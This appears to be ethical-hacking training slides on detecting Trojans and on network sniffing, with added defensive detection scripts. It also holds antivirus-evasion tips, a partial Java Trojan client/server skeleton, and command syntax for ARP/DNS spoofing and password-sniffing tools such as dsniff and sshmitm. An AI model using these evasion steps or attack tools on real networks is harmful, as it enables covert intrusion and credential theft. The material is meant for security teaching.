How to Detect Trojans?

1. Scan for suspicious open ports using tools such as
• Netstat
• Fport
• TCPView

2. Scan for suspicious running processes using
• Process Viewer
• What's on My Computer
• Inzider

3. Scan for suspicious registry entries using the tools below
• What's Running on My Computer
• MSConfig

4. Scan for suspicious network activities
• Ethereal

5. Run a Trojan scanner and detect Trojans
Tool: Netstat

© Netstat is used to display active TCP connections, IP routing tables, and ports on which the computer is listening

C:\WINNT\system32\cmd.exe

C:\>netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:7              0.0.0.0:0              LISTENING
  TCP    0.0.0.0:9              0.0.0.0:0              LISTENING
  TCP    0.0.0.0:13             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:17             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:19             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1026           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1029           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1030           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1224           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1681           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1683           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1685           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1686           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1801           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2103           0.0.0.0:0              LISTENING
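A listing like the one above only becomes evidence when it is compared with a known-good baseline. The script below is an added example and not part of the courseware: it parses Windows "netstat -an" output, reports listening TCP ports missing from an approved baseline, and names the default ports this module attributes to Back Orifice, QAZ and Donald Dick. The sample output is built from the slide's listing plus one extra listener, and the baseline set is an assumption taken from the services the fport slide shows.

```python
"""Audit Windows 'netstat -an' output against a baseline of approved listeners.

Added example for the "How to Detect Trojans" and Netstat slides; not part of
the courseware.  The sample output is constructed from the slide's listing
plus one extra listener, and BASELINE is an assumed approved set.
"""
import re

# Constructed: the slide's listing (abridged) plus a listener on 7597.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:7              0.0.0.0:0              LISTENING
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:7597           0.0.0.0:0              LISTENING
  TCP    192.168.1.10:1683      10.0.0.5:80            ESTABLISHED
  UDP    0.0.0.0:445            *:*
"""

# Listeners the fport slide maps to known Windows services (assumed approved).
BASELINE = {7, 9, 13, 17, 19, 23, 135, 139, 445, 1025, 1026, 1029, 1030}

# Default ports this module attributes to specific Trojans.
TROJAN_PORTS = {31337: "Back Orifice", 7597: "QAZ",
                23476: "Donald Dick", 23477: "Donald Dick"}

LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$")


def parse_netstat(text):
    """Yield one dict per connection line; header and blank lines are skipped.
    UDP lines carry no state, so state is '' for them."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            proto, addr, port, foreign, state = m.groups()
            yield {"proto": proto, "addr": addr, "port": int(port),
                   "foreign": foreign, "state": state or ""}


def listening_ports(text):
    """Set of TCP ports in LISTENING state."""
    return {c["port"] for c in parse_netstat(text)
            if c["proto"] == "TCP" and c["state"] == "LISTENING"}


def audit_ports(text, baseline=BASELINE):
    """Return (unexpected, trojan_hits): listening ports absent from the
    baseline, and {port: trojan name} for ports this module associates with
    a Trojan.  A hit is a lead for fport/TCPView, not proof of infection."""
    listening = listening_ports(text)
    unexpected = sorted(listening - set(baseline))
    hits = {p: TROJAN_PORTS[p] for p in sorted(listening) if p in TROJAN_PORTS}
    return unexpected, hits


if __name__ == "__main__":
    unexpected, hits = audit_ports(SAMPLE_NETSTAT)
    print("Listening ports not in baseline:", unexpected)
    for port, name in hits.items():
        print(f"port {port} is the default port of {name}; check its owning process")
```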
Tool: fport

© fport reports all open TCP/IP and UDP ports and maps them to the owning application

© fport can be used to quickly identify unknown open ports and their associated applications

C:\WINNT\system32\cmd.exe

E:\New Share\fport\Fport-2.0>fport
FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com

Process    Port  Proto  Path
tcpsvcs    7     TCP    C:\WINNT\System32\tcpsvcs.exe
tcpsvcs    9     TCP    C:\WINNT\System32\tcpsvcs.exe
tcpsvcs    13    TCP    C:\WINNT\System32\tcpsvcs.exe
tcpsvcs    17    TCP    C:\WINNT\System32\tcpsvcs.exe
tcpsvcs    19    TCP    C:\WINNT\System32\tcpsvcs.exe
tlntsvr    23    TCP    C:\WINNT\system32\tlntsvr.exe
svchost    135   TCP    C:\WINNT\system32\svchost.exe
System     139   TCP
System     445   TCP
msdtc      1025  TCP    C:\WINNT\System32\msdtc.exe
MSTask     1026  TCP    C:\WINNT\system32\MSTask.exe
mqsvc      1029  TCP    C:\WINNT\system32\mqsvc.exe
inetinfo   1030  TCP    C:\WINNT\system32\inetsrv\inetinfo.exe
msnmsgr    1224  TCP    C:\Program Files\MSN Messenger\msnmsgr.exe
msnmsgr    1681  TCP    C:\Program Files\MSN Messenger\msnmsgr.exe
msnmsgr    1683  TCP    C:\Program Files\MSN Messenger\msnmsgr.exe
msnmsgr    1685  TCP    C:\Program Files\MSN Messenger\msnmsgr.exe
mqsvc      1801  TCP    C:\WINNT\system32\mqsvc.exe
Tool: TCPView

© TCPView is a Windows program that will show detailed listings of all TCP and UDP endpoints on the system, including the local and remote addresses and state of TCP connections

© When TCPView is run, it will enumerate all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions

[Screenshot: TCPView (Sysinternals, www.sysinternals.com) listing TCP and UDP endpoints by process with their LISTENING, ESTABLISHED and TIME_WAIT states]
Tool: Process Viewer

© PrcView is a process viewer utility that displays detailed information about processes running under Windows

© PrcView comes with a command line version that allows the user to write scripts to check if a process is running, kill it, etc.

© The Process Tree shows the process hierarchy for all running processes

[Screenshot: Process Viewer listing running processes (acrobat.exe, alg.exe, csrss.exe, explorer.exe, IEXPLORE.EXE, inetinfo.exe, lsass.exe, msmsgs.exe, notepad.exe, PrcView.exe, rsvp.exe, services.exe, ...) with ID, priority, path and thread details, and the version information of EXPLORER.EXE]
Tool: What's on My Computer

© It gives information about any file, folder, or program on your computer

© Allows to search for information on the web

© Keeps out viruses and Trojans

© Keeps your computer secure

[Screenshot: What's on My Computer browsing C:\Documents and Settings\test\Desktop, with All, Documents, Recycle Bin, Others, Programs, Running, Auto-start, Files and Registry views]
Inzider - Tracks Processes and Ports

http://ntsecurity.nu/cgi-bin/download/inzider.exe.pl

© This is a very useful tool that lists processes in the Windows system and the ports each one listens on

© For instance, under Windows 2000, Beast injects itself into other processes, so it is not visible in the Task Manager as a separate process
Tool: What's Running on My Computer

© It gives complete information about processes, services, IP connections, modules, drivers, etc. running on your computer

Screenshot showing list of processes running
Tool: MSConfig

© Microsoft System Configuration Utility or MSCONFIG is a tool used to troubleshoot problems with your computer

© It ensures your computer will boot faster and crash less

[Screenshot: System Configuration Utility, Services tab, listing services with manufacturer and status (Alerter, Application Management, AVG7 Alert Manager Server, AVG7 Update Service, Background Intelligent Transfer, Computer Browser, Indexing Service, ClipBook, DHCP Client, Logical Disk Manager, DNS Client) and the Hide All Microsoft Services option]
Anti-Trojan Software

© There are many anti-Trojan software programs available from many vendors

© Below is the list of some of the anti-Trojan software that is available for trial:

• Trojan Guard

• Trojan Hunter

• ZoneAlarm (Win98 & up), 4.530

• WinPatrol (Win All), 6.0

• LeakTest, 12

• Kerio Personal Firewall, 2.15

• Sub-Net

• TAVScan

• SpyBot Search & Destroy

• Anti Trojan

• Cleaner
Evading Anti-Virus Techniques

© Never use Trojans from the wild (anti-virus can detect these easily)

© Write your own Trojan and embed it into an application

© Change the Trojan's syntax

• Convert exe to VB script

• Convert exe to doc

• Convert exe to ppt

© Change the checksum

© Change the content of the Trojan using a hex editor

© Break the Trojan file into multiple pieces
Sample Code for Trojan Client/Server

TrojanClient.java

/*
 * TrojanClient executes remote commands on server
 * Requires TrojanServer to be running
 */
import java.io.*;
import java.net.*;
import javax.swing.*;

public class TrojanClient {

    // place all the code in the SPE

    public static void main(String[] args) throws IOException {

        // check if 'host' and 'port' are passed; the slide tested
        // args.length > 2, which would demand three arguments for two parameters
        if (args.length < 2) {
            System.out.println("Usage: java TrojanClient <hostname> <port>");
            System.out.println("Example: java TrojanClient Omegasvr 2");  // port number cut off in the slide
            System.exit(0);
        }

        String host = args[0];
        String port = args[1];
        // the remainder of the client is not shown in the slide
    }
}

TrojanServer.java

/*
 * Trojan horse server
 * Accepts remote command from client
 */
import java.net.*;
import java.io.*;

public class TrojanServer {

    // This is my SPE

    public static void main(String[] args) throws IOException {

        // check if 'port number' is passed
        if (args.length < 1) {
            System.out.println("Usage: java TrojanServer <port>");
            System.exit(0);
        }

        String port = args[0];

        // the constructor that opens the listening socket is not shown in the slide
        TrojanServer b = new TrojanServer(port);
    } // end main
}
Evading Anti-Trojan/Antivirus using Stealth Tools v2.0

© It is a program that helps to send Trojans or suspicious files that are undetectable to antivirus software

© Its features include add bytes, bind, change string, create VBS, scramble/pack files, split/join files

[Screenshot: Stealth Tools v2.0 with an Amitis 1.4.3 server file selected, showing the About, Add Bytes, Change String, Pack/Scramble and Split/Join functions]
Backdoor Countermeasures

© Most commercial antivirus products can automatically scan and detect backdoor programs before they can cause damage (for example, before accessing a floppy, running an exe, or downloading mail)

© An inexpensive tool called Cleaner (http://www.moosoft.com/cleaner.html) can identify and eradicate 1000 types of backdoor programs and Trojans

© Educate users not to install applications downloaded from the Internet and email attachments
Tool: Tripwire

© It is a System Integrity Verifier (SIV)

© Tripwire will automatically calculate cryptographic hashes of all key system files or any file that is to be monitored for modifications

© Tripwire software works by creating a baseline "snapshot" of the system

© It will periodically scan those files, recalculate the information, and see if any of the information has changed; if there is a change, an alarm is raised
System File Verification

© Windows 2000 introduced Windows File Protection (WFP), which protects system files that were installed by the Windows 2000 setup program from being overwritten

© The hashes in this file could be compared with the SHA-1 hashes of the current system files to verify their integrity against the factory originals

© The sigverif.exe utility can perform this verification process

[Screenshot: File Signature Verification dialog. "To help maintain the integrity of your system, critical files have been digitally signed so that any changes to these files can be quickly detected. Click Advanced to customize verification options. Click Start to check for any system files that are not digitally signed." Scanning files... 5%]
MD5sum

© It checks for file integrity

C:\WINNT\system32\cmd.exe

E:\CEH\Mod 6 Trojan\Wrappers>md5sum -c list.txt
What's On My Computer.exe: OK
msconfig.exe: OK
md5sum.exe: OK
list.txt: FAILED
md5sum: WARNING: 1 of 4 computed checksums did NOT match

E:\CEH\Mod 6 Trojan\Wrappers>
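The Tripwire slide describes the baseline-snapshot-and-rescan method and the md5sum slide shows a checksum list being verified. The script below is an added example, not Tripwire's or md5sum's code: it takes a SHA-256 baseline of a constructed directory, stores it as JSON, tampers with the tree in the way the QAZ slide describes (Notepad replaced, note.com dropped in) and re-verifies. The baseline file is kept out of the monitored set; a checksum list that covers itself cannot pass its own check, which is one way to get the "list.txt: FAILED" line shown above. SHA-256, the directory layout and the file name baseline.json are assumptions for the demonstration.

```python
"""Baseline-snapshot and re-verify file integrity, as Tripwire and md5sum -c do.

Added example for the Tripwire and MD5sum slides; not part of the courseware,
Tripwire or md5sum.  SHA-256 replaces MD5, and the directory tree, the
tampering and the baseline file name are constructed for the demonstration.
"""
import hashlib
import json
import os
import tempfile

BASELINE_FILE = "baseline.json"  # assumed name; kept out of the monitored set


def file_digest(path, chunk=65536):
    """SHA-256 of a file, read in chunks so large binaries do not fill memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root, exclude=(BASELINE_FILE,)):
    """The Tripwire 'baseline snapshot': {relative path: digest} for every
    file under root, skipping the baseline file itself."""
    base = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if rel not in exclude:
                base[rel] = file_digest(full)
    return base


def verify(root, baseline):
    """Rescan and classify each path as ok, modified, missing or new."""
    current = snapshot(root)
    report = {"ok": [], "modified": [], "missing": [], "new": []}
    for rel, digest in baseline.items():
        if rel not in current:
            report["missing"].append(rel)
        elif current[rel] != digest:
            report["modified"].append(rel)
        else:
            report["ok"].append(rel)
    report["new"] = sorted(set(current) - set(baseline))
    return report


def write_file(root, rel, data):
    """Create rel (with '/' separators) under root, making parent folders."""
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def demo():
    """Baseline a constructed tree, tamper with it the way the QAZ slide
    describes (Notepad replaced, note.com dropped in), and re-verify."""
    root = tempfile.mkdtemp(prefix="fim-demo-")
    for rel, data in {"bin/notepad.exe": b"original notepad",
                      "etc/hosts": b"127.0.0.1 localhost\n",
                      "README": b"docs"}.items():
        write_file(root, rel, data)
    with open(os.path.join(root, BASELINE_FILE), "w") as f:
        json.dump(snapshot(root), f)

    write_file(root, "bin/notepad.exe", b"trojanised notepad")   # modified
    write_file(root, "bin/note.com", b"original notepad")        # new
    os.remove(os.path.join(root, "README"))                      # missing

    with open(os.path.join(root, BASELINE_FILE)) as f:
        return verify(root, json.load(f))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9s}: {paths}")
```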
Microsoft AntiSpyware (Beta 1)

© It helps to protect Windows users from spyware and unwanted software

© Reduces negative effects such as slow PC performance, unwanted changes to Internet settings, and unauthorized use of your private information

[Screenshot: Microsoft AntiSpyware Beta 1 system summary: no scan run yet, scan scheduled at 2:00 AM every day, real-time protection 3 of 3 active, spyware definitions of April 29, 2005, AutoUpdater active; this version expires on July 31, 2005]
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H ow to Avoi d a Troj an I nfecti on? 



© Do not download blindly from people or sites 
which you aren't 100% sure about 

© Even if the file comes from a friend, be sure 
what the fi le is before openi ng it 

© Do not use features in programs that 
automati cal I y get or previ ew f i I es 

© Do not bl i ndly type commands that others td I 
you to type, or go to web addresses mentioned 
by strangers, or run pre-fabricated programs or 
scri pts 
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How to Avoid a Trojan Infection?

© Do not be lulled into a false sense of security just because an antivirus program is running on the system

© Ensure that the corporate perimeter defenses are kept continuously up to date

© Filter and scan all content at the perimeter defenses that could contain malicious content

© Run local versions of antivirus, firewall, and intrusion detection software on the desktop
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How to Avoid a Trojan Infection?

© Rigorously control user permissions within the desktop environment to prevent the installation of malicious applications

© Manage local workstation file integrity through checksums, auditing, and port scanning

© Monitor internal network traffic for odd ports or encrypted traffic

© Use multiple virus scanners

© Install software for identifying and removing adware, malware, and spyware
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Summary

© Trojans are malicious pieces of code that carry cracker software to a target system

© Trojans are used primarily to gain and retain access on the target system

© Trojans often reside deep in the system and make registry changes that allow them to serve their purpose as a remote administration tool

© Popular Trojans include Back Orifice, NetBus, SubSeven, Beast, etc.

© Awareness and preventive measures are the best defense against Trojans
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Ethical Hacking

Module VII
Sniffers

Scenario

Dave works as an engineer in the IT support staff of a multinational banking company. Sam, a graduate in Computer Engineering, has recently been recruited by the bank as a trainee to work under Dave. Sam knows about packet sniffers and has seen their malicious use. Sam wants to sniff the network to show the vulnerabilities to Dave.

1. What information does Sam need to install a sniffing program?
2. How can Sam find out if there are any sniffing detectors on the network?
3. Can Sam sniff from a remote network?
4. Can he install a sniffer on Dave's machine?
5. Can he find credit card information by sniffing?
6. Is Sam's action ethical?
7. Will he be charged, under the law, for sniffing the network?
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Module Objectives

© Definition

© Protocols vulnerable to sniffing

© Types of sniffing

© What is ARP / ARP poisoning

© Tools for ARP spoofing

© MAC flooding

© Tools for MAC flooding

© Sniffer hacking tools

© Steps to perform DNS poisoning

© Tools for sniffing

© Countermeasures

© Summary
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Module Flow

Definition of Sniffing
-> Protocols Vulnerable to Sniffing
-> Active Sniffing
-> Passive Sniffing
-> Sniffer Hacking Tools
-> Summary
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Definition: Sniffing

© A program or device that captures vital information from the network traffic specific to a particular network

© Sniffing is a data interception technology

© The objective of sniffing is to steal:

• Passwords (from email, the web, SMB, FTP, SQL, or Telnet)

• Email text

• Files in transfer (email files, FTP files, or SMB)
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Protocols Vulnerable to Sniffing

© Protocols that are susceptible to sniffers include:

• Telnet and Rlogin: Keystrokes including user names and passwords

• HTTP: Data sent in clear text

• SMTP: Passwords and data sent in clear text

• NNTP: Passwords and data sent in clear text

• POP: Passwords and data sent in clear text

• FTP: Passwords and data sent in clear text

• IMAP: Passwords and data sent in clear text
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NetworkView - Scans the Network for Devices

[Screenshot: NetworkView listing the discovered devices 192.168.0.1, 192.168.0.5, 192.168.0.8, 192.168.0.9, 192.168.0.12, 192.168.0.17 and 192.168.0.79, with the Properties dialog (General, NetBIOS, SNMP, TCP Ports, WMI, Note, Monitoring tabs) open for 192.168.0.1: discovery date, last update 04/27/05 12:45:29 PM, IP address, MAC address, NIC manufacturer, DNS name, NetBIOS/SYS name and NetBIOS domain fields, with Export, OK, Cancel, Apply and Help buttons.]
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Ethereal

© Ethereal is a network protocol analyzer for UNIX and Windows

© It allows the user to examine data from a live network or from a capture file on a disk

© The user can interactively browse the captured data, viewing summary and detailed information for each packet captured
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[Screenshot: Ethereal capture window (File, Edit, Capture, Display, Tools, Help) listing 17 frames exchanged between 10.0.0.2 and 10.0.0.5: NFS V2 GETATTR and LOOKUP calls and replies, plus an ARP request for 10.0.0.2 broadcast from 00:40:95:42:2f:9e to ff:ff:ff:ff:ff:ff and the reply "10.0.0.2 is at 00:00:21:20:a0:05". The protocol tree for frame 1 expands into Ethernet II, Internet Protocol, User Datagram Protocol, Remote Procedure Call and Network File System, with a hex dump pane and a filter bar below; status: live capture in progress.]
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Types of Sniffing

© There are two types of sniffing:

• Passive sniffing

• Active sniffing
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Passive Sniffing

© Passive sniffing is sniffing through a hub

© The attacker simply connects the laptop to the hub and starts sniffing

Copyright © by EC-Council
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Active Sniffing

[Diagram: LAN hosts and an attacker connected to a switch. The switch looks at the MAC addresses associated with each frame, sending data only to the required connection.]

Techniques for active sniffing:
• MAC flooding
• ARP spoofing
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[Diagram caption: the attacker tries to poison the switch by sending bogus MAC addresses]

© Sniffing through a switch
© Difficult to sniff
© Can easily be traced
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What is ARP?

© Address Resolution Protocol is a network layer protocol used to convert an IP address to a physical address (called a MAC address), such as an Ethernet address

© To obtain a physical address, the host broadcasts an ARP request to the TCP/IP network

© The host with the IP address in the request replies with its physical hardware address on the network

[Diagram: IP address -> MAC address; IP datagram]
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ARP Poisoning

© ARP resolves IP addresses to the MAC (hardware) address of the interface to which data is sent

© ARP packets can be forged to send data to the attacker's machine

© An attacker can exploit ARP poisoning to intercept network traffic between two machines on the network

© By MAC flooding a switch's ARP table with spoofed ARP replies, the attacker can overload the switch and then sniff packets on the network while the switch is in hub mode
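The request/reply exchange described under "What is ARP?" is also what gives ARP poisoning away: a poisoning tool answers for an address nobody asked about and rebinds a known IP (typically the router) to a different MAC. The following monitor, an added example that is not part of the courseware, reads ARP messages written in the style of Ethereal's Info column ("Who has A? Tell B" / "A is at MM:MM:MM:MM:MM:MM"), which are constructed here, and flags unsolicited replies, changes to learned or trusted bindings, and one MAC claiming several IPs.

```python
"""Spot ARP-poisoning symptoms in a stream of ARP messages (added example).

Input lines are constructed in the style of Ethereal's Info column:
    "Who has A? Tell B"              (request)
    "A is at MM:MM:MM:MM:MM:MM"      (reply)
"""
import re
from dataclasses import dataclass, field

REQUEST_RE = re.compile(r"^Who has (\S+)\? Tell (\S+)$")
REPLY_RE = re.compile(r"^(\S+) is at ([0-9a-f]{2}(?::[0-9a-f]{2}){5})$",
                      re.IGNORECASE)


@dataclass
class ArpMonitor:
    # Static IP -> MAC bindings the defender knows are correct (e.g. the gateway).
    trusted: dict
    table: dict = field(default_factory=dict)   # learned IP -> MAC
    pending: set = field(default_factory=set)   # IPs with an outstanding request
    alerts: list = field(default_factory=list)

    def _alert(self, msg):
        if msg not in self.alerts:          # report each finding once
            self.alerts.append(msg)

    def feed(self, line):
        m = REQUEST_RE.match(line.strip())
        if m:
            self.pending.add(m.group(1))    # a reply for this IP is now expected
            return
        m = REPLY_RE.match(line.strip())
        if not m:
            return                          # not an ARP line; ignore it
        ip, mac = m.group(1), m.group(2).lower()
        if ip not in self.pending:          # nobody asked: gratuitous/forged reply
            self._alert(f"unsolicited reply: {ip} is at {mac}")
        self.pending.discard(ip)
        if ip in self.trusted and self.trusted[ip] != mac:
            self._alert(f"trusted binding violated: {ip} expected "
                        f"{self.trusted[ip]}, got {mac}")
        elif ip in self.table and self.table[ip] != mac:
            self._alert(f"binding changed: {ip} {self.table[ip]} -> {mac}")
        self.table[ip] = mac
        # One MAC answering for several IPs (its own plus the router's) is the
        # classic footprint of a host poisoning both ends of a conversation.
        owners = sorted(i for i, known in self.table.items() if known == mac)
        if len(owners) > 1:
            self._alert(f"MAC {mac} claims multiple IPs: {owners}")


# Constructed sample: a normal exchange between a host and its router, then a
# third MAC (00:de:ad:be:ef:99) rebinding both addresses to itself.
SAMPLE = [
    "Who has 192.168.1.254? Tell 192.168.1.21",
    "192.168.1.254 is at 00:11:22:33:44:55",
    "Who has 192.168.1.21? Tell 192.168.1.254",
    "192.168.1.21 is at 00:aa:bb:cc:dd:01",
    "192.168.1.254 is at 00:de:ad:be:ef:99",
    "192.168.1.21 is at 00:de:ad:be:ef:99",
]
ROUTER_BINDING = {"192.168.1.254": "00:11:22:33:44:55"}   # constructed


def scan(lines, trusted=None):
    """Feed every line to a fresh monitor and return the alerts it raised."""
    mon = ArpMonitor(trusted=dict(trusted or {}))
    for line in lines:
        mon.feed(line)
    return mon.alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE, ROUTER_BINDING):
        print(alert)
```

The same checks apply to the output of `arp -a` polled over time, which is how a host without a capture tool can watch its own cache for a rebound gateway.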
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ARP Poisoning (Poisoning the Router)

[Diagram: the victim John (IP 192.168.1.21), the attacker, and the router.]

1. The attacker broadcasts that his IP is 192.168.1.254 (the router's IP) and his MAC address is ATTACKERS_MAC
2. John's Internet traffic is forwarded to the attacker's system, as the attacker's system is now associated with the router's IP address
3. The attacker sniffs the traffic from John and forwards it to the router. The router then forwards it on to the Internet
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Router: IP 192.168.1.254, MAC ROUTERS_MAC
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Tools for ARP Spoofing

© Tools for ARP spoofing

• Arpspoof

• Ettercap
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
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Ettercap

[Screenshot: ettercap 0.6.7 (c) 2002 ALoR & NaGA started from C:\Program Files\ettercap at the Windows command prompt. It lists the available devices [dev1] to [dev7] and asks which one to use, then reports "1 hosts in this LAN" and shows the host 97.10.15.72 selected.]
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A tool for IP-based sniffing in a switched network, MAC-based sniffing, OS fingerprinting, ARP-poisoning-based sniffing, and so on
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MAC Flooding

© MAC flooding involves flooding the switch with numerous requests

© Switches have a limited memory for mapping MAC addresses to the physical ports on the switch

© MAC flooding makes use of this limitation to bombard the switch with fake MAC addresses until the switch can't keep up

© The switch then acts as a hub, broadcasting packets to all the machines on the network

© After this, sniffing can be easily performed
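Because the attack depends on pushing thousands of distinct source MACs through one port in a short time, the defender's signal is the number of distinct source addresses per port per second, not any single frame. The detector below is an added example, not part of the courseware: it keeps a sliding window of source MACs per switch port over a constructed frame feed and raises one alert per burst; the hosts, ports and timings are all assumptions.

```python
"""Flag MAC-flooding behaviour from a feed of frames seen per switch port.

Added example (not from the courseware). A switch's CAM table holds a bounded
number of source MACs; a flooding tool pushes thousands of random ones
through a single port in a fraction of a second. The frame feed is
constructed in-line; a real deployment would take it from a SPAN port,
sFlow export or the switch's MAC-address-table log.
"""
from collections import defaultdict, deque
import random


def detect_mac_flood(frames, window=1.0, threshold=50):
    """frames: iterable of (time_seconds, port, src_mac), sorted by time.

    Returns [(port, time, distinct_macs), ...]: one alert per burst, raised
    the first time a port shows more than `threshold` distinct source MACs
    inside `window` seconds. The port is re-armed once the count falls to
    half the threshold so that a later burst alerts again."""
    recent = defaultdict(deque)                      # port -> deque[(t, mac)]
    counts = defaultdict(lambda: defaultdict(int))   # port -> mac -> n in window
    flagged, alerts = set(), []
    for t, port, mac in frames:
        q, seen = recent[port], counts[port]
        q.append((t, mac))
        seen[mac] += 1
        while q and t - q[0][0] > window:            # expire frames outside the window
            _, old = q.popleft()
            seen[old] -= 1
            if seen[old] == 0:
                del seen[old]
        distinct = len(seen)
        if distinct > threshold and port not in flagged:
            flagged.add(port)
            alerts.append((port, t, distinct))
        elif distinct <= threshold // 2:
            flagged.discard(port)                    # burst is over; re-arm
    return alerts


def constructed_frames():
    """Three real hosts on port 1 and one on port 2 chatting for 5 s, plus
    500 frames with random source MACs on port 3 inside half a second."""
    rng = random.Random(7)                           # fixed seed: repeatable
    hosts = ["00:11:22:33:44:01", "00:11:22:33:44:02", "00:11:22:33:44:03"]
    frames = []
    for i in range(200):
        frames.append((i * 0.025, 1, hosts[i % 3]))
        frames.append((i * 0.025, 2, "00:11:22:33:44:10"))
    for i in range(500):
        fake = ":".join("%02x" % rng.randrange(256) for _ in range(6))
        frames.append((2.0 + i * 0.001, 3, fake))
    frames.sort(key=lambda f: f[0])
    return frames


if __name__ == "__main__":
    for port, t, n in detect_mac_flood(constructed_frames()):
        print(f"port {port}: {n} distinct source MACs within 1 s at t={t:.3f}")
```

On a managed switch the same condition is what port security enforces by capping learned MACs per port; this monitor is the passive equivalent for switches without it.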
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Tools for MAC Flooding

© Tools for MAC flooding

• Macof

• Etherflood
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© Macof floods the local network with random MAC addresses, causing some switches to fail open into repeating mode, which facilitates sniffing.

macof [-i interface] [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-n times]
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© EtherFlood floods a switched network with Ethernet frames with random hardware addresses

© The effect on some switches is that they start sending all traffic out on all ports, so that the attacker is able to sniff all traffic on the sub-network

© http://ntsecurity.nu/toolbox/etherflood/
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Sniffer Hacking Tools

© Sniffer hacking tools

arpspoof
■ Intercepts packets on a switched LAN

dnsspoof
■ Forges replies to DNS address and pointer queries

dsniff
■ Password sniffer

filesnarf
■ Sniffs files from NFS traffic

mailsnarf
■ Sniffs mail messages in Berkeley mbox format

msgsnarf
■ Sniffs chat messages
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Sniffer Hacking Tools (continued)

sshmitm
■ SSH monkey-in-the-middle

tcpkill
■ Kills TCP connections on a LAN

tcpnice
■ Slows down TCP connections on a LAN

urlsnarf
■ Sniffs HTTP requests in Common Log Format

webspy
■ Displays sniffed URLs in Netscape in real time

webmitm
■ HTTP/HTTPS monkey-in-the-middle
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© Arpspoof redirects packets from a target host intended for another host on the LAN by forging ARP replies

© Arpspoof is an effective way of sniffing traffic on a switch

© arpspoof [-i interface] [-t target] host
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Dnsspoof

© Dnsspoof forges replies to arbitrary DNS address/pointer queries on the LAN. DNS spoofing is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks

© dnsspoof [-i interface] [-f hostsfile] [expression]
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Dsniff

© Dsniff is a password sniffer which handles FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, VRRP, and so on

© Dsniff automatically detects and minimally parses each application protocol, only saving the interesting bits, and uses Berkeley DB as its output file format, only logging unique authentication attempts. Full TCP/IP reassembly is provided by libnids

© dsniff [-c] [-d] [-m] [-n] [-i interface] [-s snaplen] [-f services] [-t trigger[,...]] [-r|-w savefile] [expression]

[Screenshot: dsniff (dsniff-1.8-win32-static) run from the Windows command line, logging a POP login captured on 07/08/04 18:49:41: the USER and PASS lines followed by the destination host and service (pop).]
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Filesnarf

© Filesnarf saves files sniffed from NFS traffic in the current working directory

filesnarf [-i interface] [[-v] pattern [expression]]
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Mailsnarf

© Mailsnarf outputs email messages sniffed from SMTP and POP traffic in Berkeley mbox format, suitable for offline browsing with your favorite mail reader

mailsnarf [-i interface] [[-v] pattern [expression]]

[Screenshot: mailsnarf run from the Windows command line, printing a captured multipart e-mail (text/plain and text/html parts, charset iso-8859-1, quoted-printable encoding) in mbox format; the message body asks about an undelivered CEH certificate and welcome kit.]
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Msgsnarf

© Msgsnarf records selected messages from AOL Instant Messenger, ICQ 2000, IRC, MSN Messenger, or Yahoo Messenger chat sessions

msgsnarf [-i interface] [[-v] pattern [expression]]
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Sshmitm

© Sshmitm proxies and sniffs SSH traffic redirected by dnsspoof, capturing SSH password logins and optionally hijacking interactive sessions

© Only SSH protocol version 1 is (or ever will be) supported. This program is far too dangerous already

sshmitm [-d] [-I] [-p port] host [port]
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Tcpkill

© Tcpkill kills specified in-progress TCP connections (useful for libnids-based applications which require a full TCP 3-way handshake for TCB creation)

tcpkill [-i interface] [-1...9] expression
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Tcpnice

© Tcpnice slows down specified TCP connections on a LAN via active traffic shaping

tcpnice [-I] [-i interface] [-n increment] expression
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Urlsnarf

© Urlsnarf outputs all requested URLs sniffed from HTTP traffic in CLF (Common Log Format, used by almost all web servers), suitable for offline post-processing with your favorite web log analysis tool (analog, wwwstat, and so on)

urlsnarf [-n] [-i interface] [[-v] pattern [expression]]
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[Screenshot: urlsnarf run from the Windows command line, printing CLF lines for 192.168.131.67 fetching GIF images from images.agoramedia.com in July 2004, with referrer secure.agoramedia.com and user agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)".]
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Webspy

